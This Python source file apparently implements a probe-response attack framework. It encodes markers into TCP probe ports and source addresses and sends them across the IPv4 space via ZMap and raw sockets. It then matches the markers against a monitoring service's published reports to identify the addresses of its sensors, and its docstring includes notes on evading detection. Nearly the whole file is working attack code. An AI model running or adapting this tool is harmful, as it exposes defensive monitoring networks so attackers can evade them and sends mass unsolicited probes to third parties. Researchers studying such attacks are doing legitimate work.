import os import logging import threading import re import pickle import os.path import time import math import struct import queue from multiprocessing import Process, SimpleQueue from group import Group import scanner_wrapper import group_handler import report_fetcher import ipv4 from utility import ip_str_to_bytes from pypacker.checksum import fletcher32 from pypacker.psocket import SocketHndl from pypacker.layer12 import ethernet from pypacker.layer3 import ip from pypacker.layer4 import tcp split_equal = re.compile("=+").split split_space = re.compile(" +").split split_tab = re.compile("\t").split split_comma = re.compile(",").split split_slash = re.compile("/").split unpack_port = struct.Struct(">H").unpack pack_checksum = struct.Struct(">I").pack pack_port = struct.Struct(">H").pack pack_marker = struct.Struct(">Q").pack pack_byte = struct.Struct(">B").pack pack_markervalue = struct.Struct(">I").pack unpack_marker = struct.Struct(">Q").unpack unpack_markervalue = struct.Struct(">Q").unpack IPv4Address = ipv4.IPv4Address IPv4Network = ipv4.IPv4Network ENCODE_PORT_DST = 1 ENCODE_IP_SRC = 2 ENCODE_PORT_SRC = 4 logger = logging.getLogger("pra_framework") class ProbeResponseAttackLogic(object): """ Implemenration of the probe response attack using dedicated scanner for probing. Workflow: >> Stage 1: - Send probes without creating initial groups (saves state information) -> create Groups WHILE getting feedback - Get result and add Groups to _iterations[index_iteration] - Create groups: Check scanner feedback and re-group per sub-group based on it >> Stage 2: - Create Ggroups before scanning (first time: after stage 1/iteration 1) - Set amount of subgroups based on amount of responses - Continue scanning until no groups are left The destination address can be encoded into different parts of markers like source IP address, source port, destination port etc. Pre-filtering of noisy values: - Noisy marker values don't need to get pre-filtered as this problem can be effectively mitigated using a trade off between marker/checksum-bits. Detection mitigation: - Avoiding low-noise markers to avoid detection does not seem to be necessary as low noise markers like destination ports would appear with a low frequency -> sending 65535 (dst port) * (other marker) values will appear approximately "amount of sensors" * y times for every attack iterations, which is likely to be a low number for a specific port "p", which is hard to detect as statistic anomaly. """ # Default parameters to be set. This is more efficient flexible # than explicitly setting them in __init__() via self._xyz... PROP_DEFAULTS = { # network options "interface_name": "eth0", "mac_source": None, "mac_gw": None, # source IP, mainly intended for native probes "ip_src": "1.1.1.1", "rate_kbit_per_s": 1000, # marker options "marker_encoding": 0, "markerbits_value": 24, "markerbits_checksum": 8, # directory to save all data related to a attack cycle (trailing slash) "base_dir_save": "./", # directory which contains "src/zmap" "base_dir_zmap": "../zmap", "disable_monitor": 1, "verbosity": 3, "report_fetcher_classname": "TracingReportFetcher", # state info. Should only be changed by internal logic. # stage 1 or 2 (initial 0) #"_stage": 0, # index to _iterations where most rectent groups get stored "_group_storeindex": 0, "use_feedback_ips": False, "use_plus1": False, "is_simulation": False, # debugging options # avoid scanning the whole network -> limit to a subnet (default is: scan whole IPv4 - blacklist) "_ip_stage1": "0.0.0.0", "_cidr_bits_stage1": 0 } def __init__(self, **kwargs): # set default values, will be overwritten by config variables # parameter hierarchy: default -> constructor for prop, default in ProbeResponseAttackLogic.PROP_DEFAULTS.items(): setattr(self, prop, kwargs.get(prop, default)) logger.debug("config: %s = %s" % (prop, kwargs.get(prop, default))) self._running = False # current scan processes self._current_scans = [] # Files self._filename_state_groups = os.path.join(self.base_dir_save, "state_groups.bin") # contains information like: ip -> response type self._filename_scannerresponse_stage1 = os.path.join(self.base_dir_save, "scanner_response.csv") if self.is_simulation: self._filename_ip_blacklist = os.path.join(self.base_dir_zmap, "blacklist.conf_simulation") self._filename_ip_whitelist = None else: self._filename_ip_blacklist = os.path.join(self.base_dir_zmap, "blacklist.conf") #self._filename_ip_whitelist = os.path.join(self.base_dir_zmap, "whitelist.conf") self._filename_ip_whitelist = None self._filename_ip_blacklist_plus_feedback_ips = os.path.join(self.base_dir_save, "blacklist_plus_feedback_addr.conf") self._filename_full_report = os.path.join(self.base_dir_save, "report_fetcher_responses.csv") self._filename_identified_monitors = os.path.join(self.base_dir_save, "identified_monitors.csv") self._dirname_scanner_logs = self.base_dir_save # set default report Fetcher if anything goes wrong self._reportfetcher_class = report_fetcher.TracingReportFetcher self.set_report_fetcher_class(self.report_fetcher_classname) self._report_fetcher = None self.attack_thread = None self.marker_bits_total = self.markerbits_value + self.markerbits_checksum self.marker_bytes_total = math.ceil((self.markerbits_value + self.markerbits_checksum)/8) # amount of bits to shift marker value to make it 4 bytes from the left # bits=9: 0000 0000 0000 0000 0000 0001 1111 1111 -> left shift=23 -> 1111 1111 1000 0000.... self.marker_value_leftshit = 32 - self.markerbits_value self.marker_value_bytes_amount = math.ceil(self.markerbits_value/8) self.marker_value_amount = 2 ** self.markerbits_value # By using pl1 groups we are saving/getting additional "amount of new subgroups" marker values logger.debug("total amount of marker VALUES: %d (plus1: %r)" % (self.marker_value_amount, self.use_plus1)) logger.debug("initial scan: %r/%r" % (self._ip_stage1, self._cidr_bits_stage1)) # Example: 5 marker values:, _log_2(5)_ = 2 -> 2 Bits = 4 Subgroups self.cidr_bits_stage1 = math.floor(math.log(self.marker_value_amount, 2)) self.marker_checksum_bytes_amount = math.ceil(self.markerbits_checksum / 8) # Groups which got/get scanned. # [[start, stop], {marker: Group}, total groups, total addresses] self._iterations = [] self._iterations.append([[0, 0], {}, 0, 0]) initial_group = Group(ip_network_object=IPv4Network(nw_ip_str=self._ip_stage1, prefixlen=self._cidr_bits_stage1), response_count=0) self._root_group_name = b"ROOT_GROUP_PRA" self._iterations[0][1][self._root_group_name] = initial_group addresses_root = 2 ** (32 - self._cidr_bits_stage1) self._iterations[0][2] = min(self.marker_value_amount, addresses_root) self._iterations[0][3] = addresses_root self._group_storeindex = 0 """ if self.markerbits_value % 8 != 0 or self.markerbits_checksum % 8 !=0: logger.warning("markerbits not multiple of 8, value/checksum = %r/%r" % (self.markerbits_value, self.markerbits_checksum)) """ # native prober # TODO: adjust this on other platforms self._native_prober_amount = 5 self._native_prober_sockets = [] self._native_prober_conn_send = [] self._native_prober_processes = [] self._native_prober_conn_send_index = 0 self._groupqueue = SimpleQueue() self._blacklist = set() # { top group marker value -> set(feedback_address1, feedback_address2, ...)} self._blacklist_toptoipv4obj = {} self._grouphandler = group_handler.GroupHandler(self.marker_value_amount, self.use_plus1, self._create_marker_bitlevel) self._initial_count = 0 iterations = property(lambda self: self._iterations) grouphandler = property(lambda self: self._grouphandler) def set_report_fetcher_class(self, classname): if self._running: return # get report fetcher by classname fetcher_module = __import__("report_fetcher") try: logger.debug("setting report fetcher class: %s" % classname) self._reportfetcher_class = getattr(fetcher_module, classname) except: raise Exception("could not load Report Fetcher class! Is it implemented in report_fetcher.py?") def _report_values_to_marker(self, ip_source, port_src, port_dst): """ Combines all markers given by a report in the correct order. Unused parts are left out. return -- markervalue (int), markerchecksum (int), marker (bytes) """ bts = [] if self.marker_encoding & ENCODE_PORT_DST == ENCODE_PORT_DST: bts.append(pack_port(port_dst)) if self.marker_encoding & ENCODE_IP_SRC == ENCODE_IP_SRC: bts.append(ip_str_to_bytes(ip_source)) if self.marker_encoding & ENCODE_PORT_SRC == ENCODE_PORT_SRC: bts.append(pack_port(port_src)) bts = b"".join(bts) #logger.debug("decoding: %s" % bts) markervalue_and_checksum = int.from_bytes(bts, "big") #logger.debug("report full marker: %s=%d" % (bts, markervalue_and_checksum)) # marker value: b"AAAA AAAA AAAA AABB" -> b"00AA AAAA AAAA AAAA" # marker checksum: b"AAAA AAAA AAAA AABB" -> b"0000 0000 0000 00BB" marker_length = self.marker_bits_total return (markervalue_and_checksum >> (marker_length - self.markerbits_value)),\ markervalue_and_checksum & (0xFFFFFFFFFFFFFFFF >> (64 - self.markerbits_checksum)),\ bts def _create_checksum_bitlevel(self, markervalue): """ Create a checksum using value markervalue markervalue -- integer to create checksum from (non padded) return -- checksum as integer """ marker_value_leftshifted = markervalue << self.marker_value_leftshit marker_value_bytes_forchecksum = pack_markervalue(marker_value_leftshifted) #logger.debug("padded marker value before checksum: %s" % marker_padded) #return pack_checksum(fletcher32(marker_padded, len(marker_padded)/2)), marker_padded #checksum_int = fletcher32(marker_value_bytes_forchecksum, len(marker_value_bytes_forchecksum)/2) & 0xFFFFFFFF return fletcher32(marker_value_bytes_forchecksum, 2) >> (32 - self.markerbits_checksum) def _create_marker_bitlevel(self, marker_value_int_to_encode): """ Create a new marker like [marker][checksum] from the given value_int. marker value: 291 -> b"00000123" (hex) -> b"000123" (marker value: eg 3 bytes) -> chk = checksum(b"000123" -> b"00012300") = b"abcdefgh" -> b"000123" (marker value) + b"abcdefgh"[:checksum_len] (marker checksum) Resulting marker (3 value bytes, 2 checksum bytes): b"000123abcdefgh" -> b"000123abcd" WARNING: this assumes self.marker_bits_total % 8 == 0 is True (otherwise shift resulting marker to the left) """ checksum_int = self._create_checksum_bitlevel(marker_value_int_to_encode) # take marker value from left, cut off marker bits from right marker_int = (marker_value_int_to_encode << self.markerbits_checksum) | checksum_int #logger.debug("new marker value orig/marker value for checksum/checksum is = %s/%s/%s" % # (marker_value, marker_value_padded, marker_checksum)) # INFO: if self.marker_bits_total is not divisible by 8 without rest: shift self.marker_bits_total % 8 to right return pack_marker(marker_int)[-self.marker_bytes_total:] def _read_scanner_feedback_addresses(self): """ Read scanner feedback addresses gathered from stage 1. Additionally this updates _filename_ip_blacklist_plus_feedback_ips to contain all blacklisted IPs (including feedback ones). """ if not os.path.exists(self._filename_scannerresponse_stage1): logger.warn("could not find response file at: %s" % self._filename_scannerresponse_stage1) return [] logger.debug("reading feedback file") fd = open(self._filename_scannerresponse_stage1, "r") # skip header fd.readline() # File format of feedback file: # classification,saddr,daddr,daddr_inner_icmp,sport,dport,success # rst,1.0.0.0,1.1.1.1,(None),256,2,0 # synack,1.0.0.1,1.1.1.1,(None),256,2,1 self._blacklist.clear() self._blacklist_toptoipv4obj.clear() groups_stage1 = self._iterations[1][1] # found IP -> remove trailing/unused bits: (found IP) >> (IPv4 length - (marker value bits)) bits_shift_ip = 32 - self.markerbits_value for line in fd: columns = split_comma(line) if len(columns) < 4: logger.warning("not enough columns in CSV file: %r" % columns) continue # CSV format: type,ip src (attack target), ip dst,ip extern (our extern ip),... responsetype = columns[0] # assume everything other than ICMP are potential monitor nodes if not responsetype.startswith("icmp"): address = columns[1] else: continue # assume ICMP unreachable indicates no monitor node try: # convert ip to marker value and check if its belongs to a found group # this is MUCH faster than checking every single group address_obj = IPv4Address(ip_str=address) # 1.2.3.4 -> 1.2 = marker value top_group_markervalue = address_obj.ip_int >> bits_shift_ip if top_group_markervalue not in groups_stage1: #logger.derbug("skipping IP not belonging in initial groups: %r" % address_obj) continue except Exception as ex: logger.warning("invalid IPv4 address in feedback file: %r" % address) print(ex) continue # this is a bit redundant but doesn't hurt if address_obj.packed not in self._blacklist: self._blacklist.add(address_obj.packed) else: # already saved # skip adding the address to the _blacklist_toptoipv4obj list continue try: self._blacklist_toptoipv4obj[top_group_markervalue].append(address_obj) except KeyError: self._blacklist_toptoipv4obj[top_group_markervalue] = [address_obj] fd.close() logger.debug("amount feedback addresses: %d" % len(self._blacklist)) # update extended blacklist file logger.debug("updating extended blacklist file") fd_read = open(self._filename_ip_blacklist, "r") blacklist_standard = fd_read.read() fd_read.close() fd_write = open(self._filename_ip_blacklist_plus_feedback_ips, "w") fd_write.write(blacklist_standard) for top_group_markervalue, addresses in self._blacklist_toptoipv4obj.items(): for addr in addresses: fd_write.write("%s/32\n" % addr.compressed) fd_write.close() def _addentry_callback(self, ip_source, port_src, port_dst): """ Callback called by reportfetcher if a new reponse was found. ip_source -- IPv4 address as string port_src -- source port as int port_dst -- destination port as int """ marker_value_report_int, marker_checksum_report_int, marker_report = self._report_values_to_marker(ip_source, port_src, port_dst) #logger.debug("from report: marker value=%d, checksum=%d, full marker=%s" % # (marker_value_report_int, marker_checksum_report_int, marker_report)) marker_checksum_gen = self._create_checksum_bitlevel(marker_value_report_int) #logger.debug("comparing checksum: new/report = %s/%s" % (checksum_gen, marker_checksum_report)) # compare via startswith: checksum could only be partially encoded # skip values having invalid checksums, ignore if no checksum is used if marker_checksum_report_int != marker_checksum_gen and self.markerbits_checksum != 0: #logger.debug("checksum didn't match (YOLO): %r!=%r" % ( # marker_checksum_report_int, marker_checksum_gen)) return # logger.debug("checksum matched!!!") if self._group_storeindex == 1: group_dict_current = self._iterations[1][1] if marker_value_report_int in group_dict_current: group_dict_current[marker_value_report_int].response_count += 1 """ logger.debug("incremented response count: group=%r, count=%d" % (group_dict_current[marker_report], group_dict_current[marker_report].response_count)) """ else: # create initial entries # marker value is actually (part of) our IP address in the first stage ip_int = marker_value_report_int << (32 - self.markerbits_value) try: ip_network = IPv4Network(nw_ip_int=ip_int, prefixlen=self.cidr_bits_stage1) newgroup = Group(ip_network_object=ip_network, response_count=1) """ self._initial_count += 1 if self._initial_count % 100 == 0: logger.debug("%d: creating initial group based on report response: marker=%s, group=%r" % (self._initial_count, marker_report, newgroup)) """ self._iterations[0][1][self._root_group_name].add_subgroup(newgroup) group_dict_current[marker_value_report_int] = newgroup except Exception as ex: logger.warning("could not create initial group (first stage), correct checksum but wrong network? ip=%r" % ip_int) print(ex) else: group_dict_current = self._iterations[self._group_storeindex][1] # add entries for iteration >= 2 try: # group should be created until now # this can additionally filter out noise as groups are created incrementally subgroup = group_dict_current[marker_value_report_int] #if random.random() > 0.5: # logger.debug("marker value=%d" % marker_value_report_int) subgroup.response_count += 1 # connect to top group to subgroup if not yet known # sub groups not connected get deleted at the end of each iteration # subgroup was not yet added, do it now if subgroup.response_count == 1: subgroup.top_group.add_subgroup(subgroup) except KeyError: """ logger.warning("checksum correct but marker value %r not found for response (total: %d), " "marker=%r -> not counting" % ( marker_value_report_int, len(group_dict_current), marker_report)) """ #logger.warning("ip=%r, port src=%r, port dst=%r" % (ip_source, port_src, port_dst)) pass def _save_state(self): """ Save the current group state using python pickle format. """ logger.debug("saving state to: %s" % self._filename_state_groups) fd_state = open(self._filename_state_groups, "wb") pickle.dump(self._iterations, fd_state) fd_state.close() logger.debug("finished saving state") def start(self): """ Starts the PRA attack. """ if self._running: logger.debug("can not start: attack is already running") return # init report fetcher self._report_fetcher = self._reportfetcher_class(self._addentry_callback, self._filename_full_report) self._running = True self.attack_thread = threading.Thread(target=self._do_attack) self.attack_thread.start() def stop(self): """ Stops the PRA attack. """ if not self._running: logger.warning("Scanner is not running -> nothing to stop") return self._running = False logger.debug("stopping any scan processes") for scanner in self._current_scans: scanner.stop() for sock in self._native_prober_sockets: sock.close() for proc in self._native_prober_processes: proc.terminate() addresses_found_amount = sum([gti[0].amount_addresses for gti in self._grouphandler.identified_groups]) logger.info("found %d addresses, saving to: %s" % (addresses_found_amount, self._filename_identified_monitors)) fd_write = open(self._filename_identified_monitors, "w") fd_write.write("address\ttimestamp\titeration\n") for group_timestamp_iteration in self._grouphandler.identified_groups: ts = group_timestamp_iteration[1] iteration = group_timestamp_iteration[2] for address in group_timestamp_iteration[0].addresses: line = "%s\t%d\t%d\n" % (address, ts, iteration) fd_write.write(line) #logger.debug(line.strip()) fd_write.close() # disable to save space #self._save_state() def _start_native_prober(self): """ Initiate processes to probe using a native python implementation. """ self._native_prober_conn_send.clear() for cnt in range(self._native_prober_amount): socket_hndl = SocketHndl(iface_name=self.interface_name, buffersize_send=2 ** 28) self._native_prober_sockets.append(socket_hndl) proc = Process(target=self._probe_native_cycler, args=(cnt, socket_hndl, self._groupqueue, self._blacklist, self.mac_source, self.mac_gw, self.ip_src, self.marker_encoding)) self._native_prober_processes.append(proc) proc.start() logger.debug("waiting some seconds for processess to settle") time.sleep(1) def _probe_native_cycler(self, cnt, sockethndl, groupqueue, ip_blacklist, mac_src_s, mac_dst_s, ip_src_s, marker_encoding): """ A native prober cycler to be used with processes. """ logger.debug("starting probing process No.%d" % cnt) #basepacket = ethernet.Ethernet(dst_s=mac_dst_s, src_s=mac_src_s) +\ basepacket = ethernet.Ethernet(dst_s=mac_dst_s, src_s=mac_src_s) +\ ip.IP(src_s=ip_src_s, dst_s="1.2.3.4") +\ tcp.TCP(sport=50821) #logger.debug("basepacket: %r" % basepacket) send = sockethndl.send ip_obj = basepacket.body_handler ip_obj_bin = ip_obj.bin tcp_obj = ip_obj.tcp ether_bytes = basepacket.header_bytes # initialize paket data basepacket.bin() queue_get = groupqueue.get while True: marker, addresses_bytes, is_cidr = queue_get() # blacklists are only used for CIDR groups, single adresses were created by feedback IPs #logger.debug("sending...") for ip_address in addresses_bytes: # single addresses or (cidr and not in blacklist) if is_cidr and ip_address in ip_blacklist: #logger.debug("not sending because in blacklist: addr=%r, CIDR=%r" % (ip_address, is_cidr)) continue ip_obj.dst = ip_address bytes_used = 0 #if cnt % 2000 == 0: # logger.debug("%d: placing marker: %r" % (self._group_storeindex, marker)) # #time.sleep(0.2) #cnt += 1 # this assumes that all marker types are fully used if marker_encoding & ENCODE_PORT_DST == ENCODE_PORT_DST: tcp_obj.dport = unpack_port(marker[: 2])[0] bytes_used += 2 if marker_encoding & ENCODE_IP_SRC == ENCODE_IP_SRC: ip_obj.src = marker[bytes_used: bytes_used + 4][0] bytes_used += 4 if marker_encoding & ENCODE_PORT_SRC == ENCODE_PORT_SRC: tcp_obj.sport = unpack_port(marker[bytes_used: bytes_used + 2])[0] # TODO: use update_auto_fields=False for faster packet creation send(ether_bytes + ip_obj_bin()) #send(ether_bytes + ip_obj_bin(update_auto_fields=False)) def _do_attack(self): """ Main attack loop to cycle through iterations until all monitors have been found. """ group_handler_obj = self._grouphandler while self._running: self._iterations.append([[0, 0], {}, 0, 0]) self._group_storeindex += 1 self._iterations[self._group_storeindex][0] = [time.time(), 0] logger.info("new attack round! group store index: %d" % self._group_storeindex) # after initial full scan if self._group_storeindex >= 2: logger.info("initiating subgrouping using group handler, top groups=%d" % len(self._iterations[self._group_storeindex - 1][1])) if self.use_feedback_ips and self._group_storeindex == 2: self._read_scanner_feedback_addresses() # create subgroups from groups of last round group_handler_obj.init_subgroup_creating(self._iterations[self._group_storeindex - 1][1], self._iterations[self._group_storeindex][1], self._blacklist_toptoipv4obj) if group_handler_obj.state == group_handler.STATE_FINISHED: logger.info("no groups left to scan, all monitors found") self._iterations[self._group_storeindex][0][1] = time.time() break elif self._group_storeindex > 1: logger.debug("letting group handler create some groups in advance..") time.sleep(10) self._report_fetcher.before_scanning() # limit scanner feedback saving to first iteration filename_output_csv = self._filename_scannerresponse_stage1 if self._group_storeindex == 1 else None if self._group_storeindex == 2: # scanner feedback should have been read by now, start native probe which need the blacklist self._start_native_prober() cnt = 0 # scan groups until handler has no groups left or we are initially scanning in stage 1 while group_handler_obj.state != group_handler.STATE_INACTIVE or self._group_storeindex == 1: """ # Iteration 0: [g_r00t] # Iteration 1: [g1], [g2], ... <- auto-created by response (we did not create '+1'-groups) # Iteration 2: [g1, +1][g2, +1] <- updated by group handler """ group = None # this is skipped in the first iteration if self._group_storeindex >= 2: while group is None and group_handler_obj.state != group_handler.STATE_INACTIVE: try: # this blocks until a new group is available # logger.debug("next group..") group = group_handler_obj.get_next_subgroup() #logger.debug("got a group from grouphandler, marker=%r, group=%r" % # (group.marker_bytes, group)) except queue.Empty: # loop over timeouts until we got a group or state of grouphandler changes #logger.debug("Empty...") time.sleep(1) pass # no groups left, break scan loop if group is None: break else: # initial scan? -> take initial group group = self._iterations[0][1][self._root_group_name] cnt += 1 #if cnt % 10000 == 0: # logger.debug("scan loop %d" % cnt) if group.is_plus1: # logger.debug("got a +1 group, not sending: %r" % group) continue # group size is too small: send probes via native implementation. # using a ZMap would be too ineffective: Trade off between # cost of creating a scan process (ZMap) vs. native probe costs if (group.amount_addresses < 5000 or group.group_type == Group.GROUP_TYPE_SINGLE_ADDRESSES)\ and self._group_storeindex != 1: if cnt % 100000 == 0: logger.info("adding %d address for native probing, cnt=%d, queue grouphandler=%d" % (group.amount_addresses, cnt, len(self._grouphandler._group_queue))) #if self._group_storeindex >= 2: # logger.debug("group=%r, CIDR=%r" % (group, group.group_type == Group.GROUP_TYPE_CIDR)) self._groupqueue.put([group.marker_bytes, group.addresses_single_bytes, group.group_type == Group.GROUP_TYPE_CIDR]) #time.sleep(0.1) else: blacklist = self._filename_ip_blacklist if self.use_feedback_ips and self._group_storeindex >= 2 and group.group_type == Group.GROUP_TYPE_CIDR: # use extended blacklist file for CIDR (avoid scanning of single IPs which # are already scanned by separate groups) blacklist = self._filename_ip_blacklist_plus_feedback_ips self._current_scans.clear() #if group.amount_addresses > 499: logger.debug("probing via zmap: max amount addresses=%r, group=%r, markervalue=%r" % (group.amount_addresses, group, group.marker_value_int)) # time.sleep(2) scan_timeout = -1 """ if self._group_storeindex == 1: scan_timeout = 60 * 60 #scan_timeout = 10 logger.debug("limiting scan to %d seconds" % scan_timeout) """ # group.markervalue: this is None in the first stage -> encode target address # checksum: ZMap module got his own implementation which is needed by stage 0 # (create checksum of IP addresses) scanner = scanner_wrapper.ZmapWrapper( filename_output_csv=filename_output_csv, filename_blacklist_target_ip=blacklist, filename_whitelist_target_ip=self._filename_ip_whitelist, # TODO: comment in to save scanner logs, disables scanner feedback! #dirname_logs=self._dirname_scanner_logs, rate_kbit_per_s=self.rate_kbit_per_s, interface_name=self.interface_name, mac_source=self.mac_source, mac_gw=self.mac_gw, marker_encoding=self.marker_encoding, markervalue=group.marker_value_int, markerbits_value=self.markerbits_value, markerbits_checksum=self.markerbits_checksum, disable_monitor=self.disable_monitor, verbosity=3, dir_zmap=self.base_dir_zmap, target_addresses=group.addresses, fast_mode=False, scan_timeout=scan_timeout) self._current_scans.append(scanner) scanner.start() self._current_scans.clear() # we don't use the grouphandler so we have to break here if self._group_storeindex == 1: break while self._grouphandler.queuesize > 0: logger.debug("waiting until all queued native probes have been processed, queue: %d" % self._grouphandler.queuesize) time.sleep(5) while not self._groupqueue.empty(): logger.debug("waiting until group queue has been emptied") time.sleep(5) self._report_fetcher.after_scanning() self._iterations[self._group_storeindex][0][1] = time.time() logger.info("duration of round %d: %d seconds, groups (should be unchanged)=%d" % ( self._group_storeindex, int(self._iterations[self._group_storeindex][0][1] - self._iterations[self._group_storeindex][0][0]), len(self._iterations[self._group_storeindex][1]))) # root -> 1st stage -> 2nd stage if self._group_storeindex >= 2: if self.use_plus1: group_handler_obj.update_plus1_subgroups(self._iterations[self._group_storeindex - 1][1]) # update amount of groups logger.debug("updating amount of groups") self._iterations[self._group_storeindex][2] = len(self._iterations[self._group_storeindex][1]) # update total addresses logger.debug("updating total addresses") self._iterations[self._group_storeindex][3] = sum([group.amount_addresses for _, group in self._iterations[self._group_storeindex][1].items()]) group_handler_obj.remove_empty_groups(self._iterations[self._group_storeindex][1]) # now everything should be uptodate, cleanup groups of last round if self._group_storeindex >= 2: # TODO: activate if needed group_handler_obj.cleanup_groups(self._iterations[self._group_storeindex - 1][1]) self.stop() def get_amount_of_probes(self): """ Return the total amount of probes (or network packets) sent out. """ # - Single feedback addresses could have been scanned: remove redundant counted single addresses # len([group1, group2]) -> len([singleaddr_group1, group1-singleaddr_group1, ...]) return self._grouphandler.addresses_total - len(self._blacklist)